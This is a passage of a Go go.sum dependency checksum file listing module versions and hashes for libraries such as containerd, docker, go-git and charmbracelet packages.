h1:gCLVsLfv1egrcZu+GoJATN5ts75F2s62ih/457eWzOw= github.com/Azure/go-ansiterm v0.0.0-20250102033503-faa5f7b0171c h1:udKWzYgxTojEKWjV8V+WSxDXJ4NFATAsZjh8iIbsQIg= github.com/Azure/go-ansiterm v0.0.0-20250102033503-faa5f7b0171c/go.mod h1:xomTg63KZ2rFqZQzSB4Vz2SUXa1BpHTVz9L5PTmPC4E= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk= github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho= github.com/CycloneDX/cyclonedx-go v0.10.0 h1:7xyklU7YD+CUyGzSFIARG18NYLsKVn4QFg04qSsu+7Y= github.com/CycloneDX/cyclonedx-go v0.10.0/go.mod h1:vUvbCXQsEm48OI6oOlanxstwNByXjCZ2wuleUlwGEO8= github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5 h1:IEjq88XO4PuBDcvmjQJcQGg+w+UaafSy8G5Kcb5tBhI= github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5/go.mod h1:exZ0C/1emQJAw5tHOaUDyY1ycttqBAPcxuzf7QbY6ec= github.com/Microsoft/go-winio v0.5.2/go.mod h1:WpS1mjBmmwHBEWmogvA2mj8546UReBk4v8QkMxJ6pZY= github.com/Microsoft/go-winio v0.6.2 h1:F2VQgta7ecxGYO8k3ZZz3RS8fVIXVxONVUPlNERoyfY= github.com/Microsoft/go-winio v0.6.2/go.mod h1:yd8OoFMLzJbo9gZq8j5qaps8bJ9aShtEA8Ipt1oGCvU= github.com/Microsoft/hcsshim v0.13.0 h1:/BcXOiS6Qi7N9XqUcv27vkIuVOkBEcWstd2pMlWSeaA= github.com/Microsoft/hcsshim v0.13.0/go.mod h1:9KWJ/8DgU+QzYGupX4tzMhRQE8h6w90lH6HAaclpEok= github.com/ProtonMail/go-crypto v1.3.0 h1:ILq8+Sf5If5DCpHQp4PbZdS1J7HDFRXz/+xKBiRGFrw= github.com/ProtonMail/go-crypto v1.3.0/go.mod h1:9whxjD8Rbs29b4XWbB8irEcE8KHMqaR2e7GWU1R+/PE= github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6 h1:5L8Mj9Co9sJVgW3TpYk2gxGJnDjsYuboNTcRmbtGKGs= github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6/go.mod h1:3HgLJ9d18kXMLQlJvIY3+FszZYMxCz8WfE2MQ7hDY0w= github.com/agext/levenshtein v1.2.3 h1:YB2fHEn0UJagG8T1rrWknE3ZQzWM06O8AMAatNn7lmo= github.com/agext/levenshtein v1.2.3/go.mod h1:JEDfjyjHDjOF/1e4FlBE/PkbqA9OfWu2ki2W0IB5558= github.com/alecthomas/assert v1.0.0 h1:3XmGh/PSuLzDbK3W2gUbRXwgW5lqPkuqvRgeQ30FI5o= github.com/alecthomas/assert v1.0.0/go.mod h1:va/d2JC+M7F6s+80kl/R3G7FUiW6JzUO+hPhLyJ36ZY= github.com/alecthomas/assert/v2 v2.11.0 h1:2Q9r3ki8+JYXvGsDyBXwH3LcJ+WK5D0gc5E8vS6K3D0= github.com/alecthomas/assert/v2 v2.11.0/go.mod h1:Bze95FyfUr7x34QZrjL+XP+0qgp/zg8yS+TtBj1WA3k= github.com/alecthomas/chroma/v2 v2.19.0 h1:Im+SLRgT8maArxv81mULDWN8oKxkzboH07CHesxElq4= github.com/alecthomas/chroma/v2 v2.19.0/go.mod h1:RVX6AvYm4VfYe/zsk7mjHueLDZor3aWCNE14TFlepBk= github.com/alecthomas/colour v0.1.0 h1:nOE9rJm6dsZ66RGWYSFrXw461ZIt9A6+nHgL7FRrDUk= github.com/alecthomas/colour v0.1.0/go.mod h1:QO9JBoKquHd+jz9nshCh40fOfO+JzsoXy8qTHF68zU0= github.com/alecthomas/repr v0.4.0 h1:GhI2A8MACjfegCPVq9f1FLvIBS+DrQ2KQBFZP1iFzXc= github.com/alecthomas/repr v0.4.0/go.mod h1:Fr0507jx4eOXV7AlPV6AVZLYrLIuIeSOWtW57eE/O/4= github.com/anchore/go-lzo v0.1.0 h1:NgAacnzqPeGH49Ky19QKLBZEuFRqtTG9cdaucc3Vncs= github.com/anchore/go-lzo v0.1.0/go.mod h1:3kLx0bve2oN1iDwgM1U5zGku1Tfbdb0No5qp1eL1fIk= github.com/anchore/go-struct-converter v0.0.0-20221118182256-c68fdcfa2092/go.mod h1:rYqSE9HbjzpHTI74vwPvae4ZVYZd1lue2ta6xHPdblA= github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160 h1:r8/1fxpbDMlQO6GgQiud1uL5eAu3p/NVUmfNx95/KY8= github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160/go.mod h1:rYqSE9HbjzpHTI74vwPvae4ZVYZd1lue2ta6xHPdblA= github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8= github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4= github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio= github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs= github.com/atotto/clipboard v0.1.4 h1:EH0zSVneZPSuFR11BlR9YppQTVDbh5+16AmcJi4g1z4= github.com/atotto/clipboard v0.1.4/go.mod h1:ZY9tmq7sm5xIbd9bOK4onWV4S6X0u6GY7Vn0Yu86PYI= github.com/aymanbagabas/go-udiff v0.4.1 h1:OEIrQ8maEeDBXQDoGCbbTTXYJMYRCRO1fnodZ12Gv5o= github.com/aymanbagabas/go-udiff v0.4.1/go.mod h1:0L9PGwj20lrtmEMeyw4WKJ/TMyDtvAoK9bf2u/mNo3w= github.com/aymerick/douceur v0.2.0 h1:Mv+mAeH1Q+n9Fr+oyamOlAkUNPWPlA8PPGR0QAaYuPk= github.com/aymerick/douceur v0.2.0/go.mod h1:wlT5vV2O3h55X9m7iVYN0TBM0NH/MmbLnd30/FjWUq4= github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694 h1:LiKs9FsSfMx3NomNclXYkv9enY77oft5Mc/vX/AKHgI= github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694/go.mod h1:PLNUetjLa77TCCziPsz0EI8a6CUxgC+1jgmWv0H25tg= github.com/bradleyjkemp/cupaloy/v2 v2.8.0 h1:any4BmKE+jGIaMpnU8YgH/I2LPiLBufr6oMMlVBbn9M= github.com/bradleyjkemp/cupaloy/v2 v2.8.0/go.mod h1:bm7JXdkRd4BHJk9HpwqAI8BoAY1lps46Enkdqw6aRX0= github.com/cenkalti/backoff/v4 v4.3.0 h1:MyRJ/UdXutAwSAT+s3wNd7MfTIcy71VQueUuFK343L8= github.com/cenkalti/backoff/v4 v4.3.0/go.mod h1:Y3VNntkOUPxTVeUxJ/G5vcM//AlwfmyYozVcomhLiZE= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/colorprofile v0.4.2 h1:BdSNuMjRbotnxHSfxy+PCSa4xAmz7szw70ktAtWRYrY= github.com/charmbracelet/colorprofile v0.4.2/go.mod h1:0rTi81QpwDElInthtrQ6Ni7cG0sDtwAd4C4le060fT8= github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 h1:eyFRbAmexyt43hVfeyBofiGSEmJ7krjLOYt/9CF5NKA= github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8/go.mod h1:SQpCTRNBtzJkwku5ye4S3HEuthAlGy2n9VXZnWkEW98= github.com/charmbracelet/x/ansi v0.11.6 h1:GhV21SiDz/45W9AnV2R61xZMRri5NlLnl6CVF7ihZW8= github.com/charmbracelet/x/ansi v0.11.6/go.mod h1:2JNYLgQUsyqaiLovhU2Rv/pb8r6ydXKS3NIttu3VGZQ= github.com/charmbracelet/x/exp/golden v0.0.0-20250806222409-83e3a29d542f h1:pk6gmGpCE7F3FcjaOEKYriCvpmIN4+6OS/RD0vm4uIA= github.com/charmbracelet/x/exp/golden v0.0.0-20250806222409-83e3a29d542f/go.mod h1:IfZAMTHB6XkZSeXUqriemErjAWCCzT0LwjKFYCZyw0I= github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e h1:uuxP7L/srRKTMRPUCZsARYBr9x/bULlN6Sc28aUAIJU= github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e/go.mod h1:vI5nDVMWi6veaYH+0Fmvpbe/+cv/iJfMntdh+N0+Tms= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= github.com/charmbracelet/x/termios v0.1.1 h1:o3Q2bT8eqzGnGPOYheoYS8eEleT5ZVNYNy8JawjaNZY= github.com/charmbracelet/x/termios v0.1.1/go.mod h1:rB7fnv1TgOPOyyKRJ9o+AsTU/vK5WHJ2ivHeut/Pcwo= github.com/charmbracelet/x/windows v0.2.2 h1:IofanmuvaxnKHuV04sC0eBy/smG6kIKrWG2/jYn2GuM= github.com/charmbracelet/x/windows v0.2.2/go.mod h1:/8XtdKZzedat74NQFn0NGlGL4soHB0YQZrETF96h75k= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.11.0 h1:lBc6kY44VFw+TDx4I8opi/EtL9m20WSEFgwIwO+UVM8= github.com/clipperhouse/displaywidth v0.11.0/go.mod h1:bkrFNkf81G8HyVqmKGxsPufD3JhNl3dSqnGhOoSD/o0= github.com/clipperhouse/uax29/v2 v2.7.0 h1:+gs4oBZ2gPfVrKPthwbMzWZDaAFPGYK72F0NJv2v7Vk= github.com/clipperhouse/uax29/v2 v2.7.0/go.mod h1:EFJ2TJMRUaplDxHKj1qAEhCtQPW2tJSwu5BF98AuoVM= github.com/cloudflare/circl v1.6.3 h1:9GPOhQGF9MCYUeXyMYlqTR6a5gTrgR/fBLXvUgtVcg8= github.com/cloudflare/circl v1.6.3/go.mod h1:2eXP6Qfat4O/Yhh8BznvKnJ+uzEoTQ6jVKJRn81BiS4= github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/compose-spec/compose-go/v2 v2.8.1 h1:27O4dzyhiS/UEUKp1zHOHCBWD1WbxGsYGMNNaSejTk4= github.com/compose-spec/compose-go/v2 v2.8.1/go.mod h1:veko/VB7URrg/tKz3vmIAQDaz+CGiXH8vZsW79NmAww= github.com/containerd/cgroups/v3 v3.0.5 h1:44na7Ud+VwyE7LIoJ8JTNQOa549a8543BmzaJHo6Bzo= github.com/containerd/cgroups/v3 v3.0.5/go.mod h1:SA5DLYnXO8pTGYiAHXz94qvLQTKfVM5GEVisn4jpins= github.com/containerd/containerd v1.7.29 h1:90fWABQsaN9mJhGkoVnuzEY+o1XDPbg9BTC9QTAHnuE= github.com/containerd/containerd v1.7.29/go.mod h1:azUkWcOvHrWvaiUjSQH0fjzuHIwSPg1WL5PshGP4Szs= github.com/containerd/containerd/api v1.9.0 h1:HZ/licowTRazus+wt9fM6r/9BQO7S0vD5lMcWspGIg0= github.com/containerd/containerd/api v1.9.0/go.mod h1:GhghKFmTR3hNtyznBoQ0EMWr9ju5AqHjcZPsSpTKutI= github.com/containerd/continuity v0.4.5 h1:ZRoN1sXq9u7V6QoHMcVWGhOwDFqZ4B9i5H6un1Wh0x4= github.com/containerd/continuity v0.4.5/go.mod h1:/lNJvtJKUQStBzpVQ1+rasXO1LAWtUQssk28EZvJ3nE= github.com/containerd/errdefs v1.0.0 h1:tg5yIfIlQIrxYtu9ajqY42W3lpS19XqdxRQeEwYG8PI= github.com/containerd/errdefs v1.0.0/go.mod h1:+YBYIdtsnF4Iw6nWZhJcqGSg/dwvV7tyJ/kCkyJ2k+M= github.com/containerd/errdefs/pkg v0.3.0 h1:9IKJ06FvyNlexW690DXuQNx2KA2cUJXx151Xdx3ZPPE= github.com/containerd/errdefs/pkg v0.3.0/go.mod h1:NJw6s9HwNuRhnjJhM7pylWwMyAkmCQvQ4GpJHEqRLVk= github.com/containerd/fifo v1.1.0 h1:4I2mbh5stb1u6ycIABlBw9zgtlK8viPI9QkQNRQEEmY= github.com/containerd/fifo v1.1.0/go.mod h1:bmC4NWMbXlt2EZ0Hc7Fx7QzTFxgPID13eH0Qu+MAb2o= github.com/containerd/log v0.1.0 h1:TCJt7ioM2cr/tfR8GPbGf9/VRAX8D2B4PjzCpfX540I= github.com/containerd/log v0.1.0/go.mod h1:VRRf09a7mHDIRezVKTRCrOq78v577GXq3bSa3EhrzVo= github.com/containerd/platforms v1.0.0-rc.1 h1:83KIq4yy1erSRgOVHNk1HYdPvzdJ5CnsWaRoJX4C41E= github.com/containerd/platforms v1.0.0-rc.1/go.mod h1:J71L7B+aiM5SdIEqmd9wp6THLVRzJGXfNuWCZCllLA4= github.com/containerd/stargz-snapshotter/estargz v0.16.3 h1:7evrXtoh1mSbGj/pfRccTampEyKpjpOnS3CyiV1Ebr8= github.com/containerd/stargz-snapshotter/estargz v0.16.3/go.mod h1:uyr4BfYfOj3G9WBVE8cOlQmXAbPN9VEQpBBeJIuOipU= github.com/containerd/ttrpc v1.2.7 h1:qIrroQvuOL9HQ1X6KHe2ohc7p+HP/0VE6XPU7elJRqQ= github.com/containerd/ttrpc v1.2.7/go.mod h1:YCXHsb32f+Sq5/72xHubdiJRQY9inL4a4ZQrAbN1q9o= github.com/containerd/typeurl/v2 v2.2.3 h1:yNA/94zxWdvYACdYO8zofhrTVuQY73fFU1y++dYSw40= github.com/containerd/typeurl/v2 v2.2.3/go.mod h1:95ljDnPfD3bAbDJRugOiShd/DlAAsxGtUBhJxIn7SCk= github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E= github.com/cyphar/filepath-securejoin v0.6.0 h1:BtGB77njd6SVO6VztOHfPxKitJvd/VPT+OFBFMOi1Is= github.com/cyphar/filepath-securejoin v0.6.0/go.mod h1:A8hd4EnAeyujCJRrICiOWqjS1AX0a9kM5XL+NwKoYSc= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM= github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb h1:4W/2rQ3wzEimF5s+J6OY3ODiQtJZ5W1sForSgogVXkY= github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb/go.mod h1:B3tI9iGHi4imdLi4Asdha1Sc6feLMTfPLXh9IUYmysk= github.com/diskfs/go-diskfs v1.7.0 h1:vonWmt5CMowXwUc79jWyGrf2DIMeoOjkLlMnQYGVOs8= github.com/diskfs/go-diskfs v1.7.0/go.mod h1:LhQyXqOugWFRahYUSw47NyZJPezFzB9UELwhpszLP/k= github.com/distribution/reference v0.6.0 h1:0IXCQ5g4/QMHHkarYzh5l+u8T3t73zM5QvfrDyIgxBk= github.com/distribution/reference v0.6.0/go.mod h1:BbU0aIcezP1/5jX/8MP0YiH4SdvB5Y4f/wlDRiLyi3E= github.com/djherbis/times v1.6.0 h1:w2ctJ92J8fBvWPxugmXIv7Nz7Q3iDMKNx9v5ocVH20c= github.com/djherbis/times v1.6.0/go.mod h1:gOHeRAz2h+VJNZ5Gmc/o7iD9k4wW7NMVqieYCY99oc0= github.com/dlclark/regexp2 v1.11.5 h1:Q/sSnsKerHeCkc/jSTNq1oCm7KiVgUMZRDUoRu0JQZQ= github.com/dlclark/regexp2 v1.11.5/go.mod h1:DHkYz0B9wPfa6wondMfaivmHpzrQ3v9q8cnmRbL6yW8= github.com/docker/cli v29.2.0+incompatible h1:9oBd9+YM7rxjZLfyMGxjraKBKE4/nVyvVfN4qNl9XRM= github.com/docker/cli v29.2.0+incompatible/go.mod h1:JLrzqnKDaYBop7H2jaqPtU4hHvMKP+vjCwu2uszcLI8= github.com/docker/distribution v2.8.3+incompatible h1:AtKxIZ36LoNK51+Z6RpzLpddBirtxJnzDrHLEKxTAYk= github.com/docker/distribution v2.8.3+incompatible/go.mod h1:J2gT2udsDAN96Uj4KfcMRqY0/ypR+oyYUYmja8H+y+w= github.com/docker/docker v28.3.3+incompatible h1:Dypm25kh4rmk49v1eiVbsAtpAsYURjYkaKubwuBdxEI= github.com/docker/docker v28.3.3+incompatible/go.mod h1:eEKB0N0r5NX/I1kEveEz05bcu8tLC/8azJZsviup8Sk= github.com/docker/docker-credential-helpers v0.9.3 h1:gAm/VtF9wgqJMoxzT3Gj5p4AqIjCBS4wrsOh9yRqcz8= github.com/docker/docker-credential-helpers v0.9.3/go.mod h1:x+4Gbw9aGmChi3qTLZj8Dfn0TD20M/fuWy0E5+WDeCo= github.com/docker/go-connections v0.5.0 h1:USnMq7hx7gwdVZq1L49hLXaFtUdTADjXGp+uj1Br63c= github.com/docker/go-connections v0.5.0/go.mod h1:ov60Kzw0kKElRwhNs9UlUHAE/F9Fe6GLaXnqyDdmEXc= github.com/docker/go-events v0.0.0-20250114142523-c867878c5e32 h1:EHZfspsnLAz8Hzccd67D5abwLiqoqym2jz/jOS39mCk= github.com/docker/go-events v0.0.0-20250114142523-c867878c5e32/go.mod h1:Uw6UezgYA44ePAFQYUehOuCzmy5zmg/+nl2ZfMWGkpA= github.com/docker/go-units v0.5.0 h1:69rxXcBk27SvSaaxTtLh/8llcHD8vYHT7WSdRZ/jvr4= github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDDbaIK4Dk= github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589 h1:LzrKhEeL5tqo8i86+5a8JgL5cEJBRspVm4FsKRK/gxA= github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589/go.mod h1:zs3tKt0dOHncKZ7QhimWwN9RP7f6W6CLdjRfscKvvcA= github.com/dsoprea/go-logging v0.0.0-20190624164917-c4f10aab7696/go.mod h1:Nm/x2ZUNRW6Fe5C3LxdY1PyZY5wmDv/s5dkPJ/VB3iA= github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd h1:l+vLbuxptsC6VQyQsfD7NnEC8BZuFpz45PgY+pH8YTg= github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd/go.mod h1:7I+3Pe2o/YSU88W0hWlm9S22W7XI1JFNJ86U0zPKMf8= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY= github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto= github.com/edsrzf/mmap-go v1.1.0/go.mod h1:19H/e8pUPLicwkyNgOykDXkJ9F0MHE+Z52B8EIth78Q= github.com/edsrzf/mmap-go v1.2.0 h1:hXLYlkbaPzt1SaQk+anYwKSRNhufIDCchSPkUD6dD84= github.com/edsrzf/mmap-go v1.2.0/go.mod h1:19H/e8pUPLicwkyNgOykDXkJ9F0MHE+Z52B8EIth78Q= github.com/elazarl/goproxy v1.7.2 h1:Y2o6urb7Eule09PjlhQRGNsqRfPmYI3KKQLFpCAV3+o= github.com/elazarl/goproxy v1.7.2/go.mod h1:82vkLNir0ALaW14Rc399OTTjyNREgmdL2cVoIbS6XaE= github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab h1:h1UgjJdAAhj+uPL68n7XASS6bU+07ZX1WJvVS2eyoeY= github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab/go.mod h1:GLo/8fDswSAniFG+BFIaiSPcK610jyzgEhWYPQwuQdw= github.com/emirpasic/gods v1.18.1 h1:FXtiHYKDGKCW2KzwZKx0iC0PQmdlorYgdFG9jPXJ1Bc= github.com/emirpasic/gods v1.18.1/go.mod h1:8tpGGwCnJ5H4r6BWwaV6OrWmMoPhUl5jm/FMNAnJvWQ= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593 h1:cIQ/Ziclb/qreqg1nqGEtH4V9UJCTaNSKz9gBRaeZlA= github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593/go.mod h1:MiEorPk0IChAoCwpg2FXyqVgbNvOlPWZAYHqqIoDNoY= github.com/felixge/httpsnoop v1.0.4 h1:NFTV2Zj1bL4mc9sqWACXbQFVBBg2W3GPvqp8/ESS2Wg= github.com/felixge/httpsnoop v1.0.4/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U= github.com/gkampitakis/ciinfo v0.3.2 h1:JcuOPk8ZU7nZQjdUhctuhQofk7BGHuIy0c9Ez8BNhXs= github.com/gkampitakis/ciinfo v0.3.2/go.mod h1:1NIwaOcFChN4fa/B0hEBdAb6npDlFL8Bwx4dfRLRqAo= github.com/gkampitakis/go-snaps v0.5.20 h1:FGKonEeQPJ12t7RQj6cTPa881fl5c8HYarMLv5vP7sg= github.com/gkampitakis/go-snaps v0.5.20/go.mod h1:gC3YqxQTPyIXvQrw/Vpt3a8VqR1MO8sVpZFWN4DGwNs= github.com/glebarez/go-sqlite v1.20.3 h1:89BkqGOXR9oRmG58ZrzgoY/Fhy5x0M+/WV48U5zVrZ4= github.com/glebarez/go-sqlite v1.20.3/go.mod h1:u3N6D/wftiAzIOJtZl6BmedqxmmkDfH3q+ihjqxC9u0= github.com/gliderlabs/ssh v0.3.8 h1:a4YXD1V7xMF9g5nTkdfnja3Sxy1PVDCj1Zg4Wb8vY6c= github.com/gliderlabs/ssh v0.3.8/go.mod h1:xYoytBv1sV0aL3CavoDuJIQNURXkkfPA/wxQ1pL1fAU= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= github.com/go-errors/errors v1.0.2 h1:xMxH9j2fNg/L4hLn/4y3M0IUsn0M6Wbu/Uh9QlOfBh4= github.com/go-errors/errors v1.0.2/go.mod h1:psDX2osz5VnTOnFWbDeWwS7yejl+uV3FEWEp4lssFEs= github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 h1:+zs/tPmkDkHx3U66DAb0lQFJrpS6731Oaa12ikc+DiI= github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376/go.mod h1:an3vInlBmSxCcxctByoQdvwPiA7DTK7jaaFDBTtu0ic= github.com/go-git/go-billy/v5 v5.8.0 h1:I8hjc3LbBlXTtVuFNJuwYuMiHvQJDq1AT6u4DwDzZG0= github.com/go-git/go-billy/v5 v5.8.0/go.mod h1:RpvI/rw4Vr5QA+Z60c6d6LXH0rYJo0uD5SqfmrrheCY= github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399 h1:eMje31YglSBqCdIqdhKBW8lokaMrL3uTkpGYlE2OOT4= github.com/go-git/go-git-fixtures/v4 v4.3.2-0.20231010084843-55a94097c399/go.mod h1:1OCfN199q1Jm3HZlxleg+Dw/mwps2Wbk9frAWm+4FII= github.com/go-git/go-git/v5 v5.17.0 h1:AbyI4xf+7DsjINHMu35quAh4wJygKBKBuXVjV/pxesM= github.com/go-git/go-git/v5 v5.17.0/go.mod h1:f82C4YiLx+Lhi8eHxltLeGC5uBTXSFa6PC5WW9o4SjI= github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI= github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-restruct/restruct v0.0.0-20190418070341-acd4e4c2cb35/go.mod h1:e2k/t2/850rC773ilFYQSoqyJ78SpTx7gtFtOY6/AYA= github.com/go-restruct/restruct v1.2.0-alpha h1:2Lp474S/9660+SJjpVxoKuWX09JsXHSrdV7Nv3/gkvc= github.com/go-restruct/restruct v1.2.0-alpha/go.mod h1:KqrpKpn4M8OLznErihXTGLlsXFGeLxHUrLRRI/1YjGk= github.com/go-test/deep v1.0.8 h1:TDsG77qcSprGbC6vTN8OuXp5g+J+b5Pcguhf7Zt61VM= github.com/go-test/deep v1.0.8/go.mod h1:5C2ZWiW0ErCdrYzpqxLbTX7MG14M9iiw8DgHncVwcsE= github.com/go-viper/mapstructure/v2 v2.4.0 h1:EBsztssimR/CONLSZZ04E8qAkxNYq4Qp9LvH92wZUgs= github.com/go-viper/mapstructure/v2 v2.4.0/go.mod h1:oJDH3BJKyqBA2TXFhDsKDGDTlndYOZ6rGS0BRZIxGhM= github.com/gobwas/glob v0.2.3 h1:A4xDbljILXROh+kObIiy5kIaPYD8e96x1tgBhUI5J+Y= github.com/gobwas/glob v0.2.3/go.mod h1:d3Ez4x06l9bZtSvzIay5+Yzi0fmZzPgnTbPcKjJAkT8= github.com/goccy/go-yaml v1.19.2 h1:PmFC1S6h8ljIz6gMRBopkjP1TVT7xuwrButHID66PoM= github.com/goccy/go-yaml v1.19.2/go.mod h1:XBurs7gK8ATbW4ZPGKgcbrY1Br56PdM69F7LkFRi1kA= github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= github.com/gohugoio/hashstructure v0.5.0 h1:G2fjSBU36RdwEJBWJ+919ERvOVqAg9tfcYp47K9swqg= github.com/gohugoio/hashstructure v0.5.0/go.mod h1:Ser0TniXuu/eauYmrwM4o64EBvySxNzITEOLlm4igec= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 h1:f+oWsMOmNPc8JmEHVZIycC7hBoQxHH9pNKQORJNozsQ= github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8/go.mod h1:wcDNUvekVysuuOpQKo3191zZyTpiI6se1N1ULghS0sw= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod 